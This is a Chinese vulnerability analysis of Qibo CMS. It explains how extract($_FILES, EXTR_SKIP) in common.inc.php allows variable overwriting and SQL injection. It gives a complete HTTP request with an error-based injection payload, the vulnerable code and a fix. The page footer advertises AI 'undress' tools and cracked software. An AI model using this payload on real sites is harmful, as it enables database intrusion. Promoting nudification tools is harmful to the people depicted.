目录 1 . 漏洞描述 2 . 漏洞触发条件 3 . 漏洞影响范围 4 . 漏洞代码分析 5 . 防御方法 6 . 攻防思考 1. 漏洞描述 齐博在/inc/common.inc.php使用$$_key=$value、extract等逻辑实现了外部输入变量的本地注册,这是模拟了GPC的功能,但同时也引入 " 本地变量
目录
<span>1</span><span>. 漏洞描述 </span><span>2</span><span>. 漏洞触发条件 </span><span>3</span><span>. 漏洞影响范围 </span><span>4</span><span>. 漏洞代码分析 </span><span>5</span><span>. 防御方法 </span><span>6</span>. 攻防思考
1. 漏洞描述
齐博在/inc/common.inc.php使用$$_key=$value、extract等逻辑实现了外部输入变量的本地注册,这是模拟了GPC的功能,但同时也引入<span>"</span><span>本地变量覆盖</span><span>"</span>、<span>"</span><span>本地变量未初始化</span><span>"</span><span>的安全风险 齐博CMS中的漏洞文件</span>/inc/common.inc.php使用 @extract($_FILES, EXTR_SKIP)来注册$_FILES的各变量,使用EXTR_SKIP来控制不覆盖已存在的变量。利用一个末初始化的变量覆盖漏洞,即可导致sql注入漏洞
Relevant Link:
http:<span>//</span><span>bbs.qibosoft.com/read-forum-tid-422299.htm</span>
2. 漏洞触发条件
0x1: 攻击入口
构造$_FILE的变量覆盖构造覆盖$cidDB变量,POST给/member/comment.php
<span>1</span>. 首先访问/member下面的<span>"</span><span>评论管理</span><span>"</span><span>功能,抓包 </span><span>2</span><span>. 在http request中构造一个attachment,如下: </span><span>/*</span><span> POST /qibo/member/comment.php?job=yz&yz=0 HTTP/1.1 Host: 127.0.0.1 Proxy-Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,</span><span>*/</span>*;q=<span>0.8</span><span> User</span>-Agent: Mozilla/<span>5.0</span> (Windows NT <span>6.1</span>; WOW64) AppleWebKit/<span>537.36</span> (KHTML, like Gecko) Chrome/<span>28.0</span>.<span>1500.95</span> Safari/<span>537.36</span> SE <span>2</span>.X MetaSr <span>1.0</span><span> Referer: http:</span><span>//</span><span>127.0.0.1/qibo/member/comment.php?job=work </span> Accept-<span>Encoding: gzip,deflate,sdch Accept</span>-Language: zh-CN,zh;q=<span>0.8</span><span> Cookie: PHPSESSID</span>=<span>jo9rpav7l51iakidv01vr9fem1; passport</span>=<span>1</span>%09admin%09ClAKVgsEBglUAwcFUgRTDgRRCF9XUAZXBAcAVQIHBlc%3D94606de1fd; USR=fvqnvbj3%<span>0922</span>%<span>091425969668</span>%09http%3A%2F%2F127.<span>0.0</span>.<span>1</span>%2Fqibo%2Fmember%2Fcomment.php%3Fjob%<span>3Dwork Content</span>-Type: multipart/form-<span>data; boundary</span>=----<span>WebKitFormBoundary6ukpBHoIrpHKtOkl Content</span>-Length: <span>227</span> ------<span>WebKitFormBoundary6ukpBHoIrpHKtOkl Content</span>-Disposition: form-data; name=<span>"</span><span>cidDB</span><span>"</span>; filename=<span>"</span><span>1' and EXP(~(select * from(select user())a)) -- </span><span>"</span><span> Content</span>-Type: text/<span>plain </span><span>1111</span> ------WebKitFormBoundary6ukpBHoIrpHKtOkl-- */<span> 注意将原来的URL上的cidDB[]</span>=<span>x删除掉; 然后构造一个文件上传的报文(GET改为POST方法) 在filename处填入注入的payload </span><span>3</span><span>. 提交该数据包,即可注入成功 </span><span>//</span><span>这次的变量覆盖是抓住了extract的EXTR_SKIP只检查已经存在的变量,但是有些没有声明的变量还是会被覆盖</span>
Relevant Link:
http:<span>//</span><span>bobao.360.cn/learning/detail/291.html</span>
3. 漏洞影响范围
齐博所有系统、所有版本
4. 漏洞代码分析
\qibo\inc\common.inc.php
<span>/*</span><span>
全局变量文件对GPC变量的过滤
从代码中可以看淡,通过$_FILE传的值,POST的内容受GPC影响,因此只能利用$_FILE变量的$key绕过add_S函数
这里,$_FILS在传递参数时,是数组形式,因此可以默认使用$_FILES的$key去覆盖
</span><span>*/</span><span>
$_POST</span>=<span>Add_S($_POST);
$_GET</span>=<span>Add_S($_GET);
$_COOKIE</span>=<span>Add_S($_COOKIE);
function Add_S($array)
{
</span><span>foreach</span>($array <span>as</span> $key=><span>$value)
{
</span><span>if</span>(!<span>is_array($value))
{
$value</span>=str_replace(<span>"</span><span></span><span>"</span>,<span>"</span><span>& # x</span><span>"</span>,$value); <span>//</span><span>过滤一些不安全字符</span>
$value=preg_replace(<span>"</span><span>/eval/i</span><span>"</span>,<span>"</span><span>eva l</span><span>"</span>,$value); <span>//</span><span>过滤不安全函数</span>
!get_magic_quotes_gpc() && $value=<span>addslashes($value);
$array[$key]</span>=<span>$value;
}
</span><span>else</span><span>
{
$array[$key]</span>=<span>Add_S($array[$key]);
}
}
</span><span>return</span><span> $array;
}
</span><span>if</span>(!ini_get(<span>'</span><span>register_globals</span><span>'</span><span>))
{
@extract($_FILES,EXTR_SKIP);
}
</span><span>foreach</span>($_COOKIE AS $_key=><span>$_value)
{
unset($$_key);
}
</span><span>foreach</span>($_POST AS $_key=><span>$_value)
{
</span>!ereg(<span>"</span><span>^\_[A-Z]+</span><span>"</span>,$_key) && $$_key=<span>$_POST[$_key];
}
</span><span>foreach</span>($_GET AS $_key=><span>$_value)
{
</span>!ereg(<span>"</span><span>^\_[A-Z]+</span><span>"</span>,$_key) && $$_key=<span>$_GET[$_key];
}</span>
5. 防御方法
\qibo\inc\common.inc.php
<span>if</span>(!ini_get(<span>'</span><span>register_globals</span><span>'</span><span>))
{
$array </span>= array(<span>'</span><span>Filedata</span><span>'</span>,<span>'</span><span>postfile</span><span>'</span>,<span>'</span><span>upfile</span><span>'</span>,<span>'</span><span>fileData</span><span>'</span>,<span>'</span><span>Filedata</span><span>'</span><span>);
</span><span>foreach</span>($array AS $key=><span>$value)
{
is_array($_FILES[$value]) </span>&& $$value =<span> $_FILES[$value];
}
}</span>
6. 攻防思考
Copyright (c) 2014 LittleHann All rights reserved
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
MinGW - Minimalist GNU for Windows
This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.
Zend Studio 13.0.1
Powerful PHP integrated development environment
EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function
mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),
WebStorm Mac version
Useful JavaScript development tools
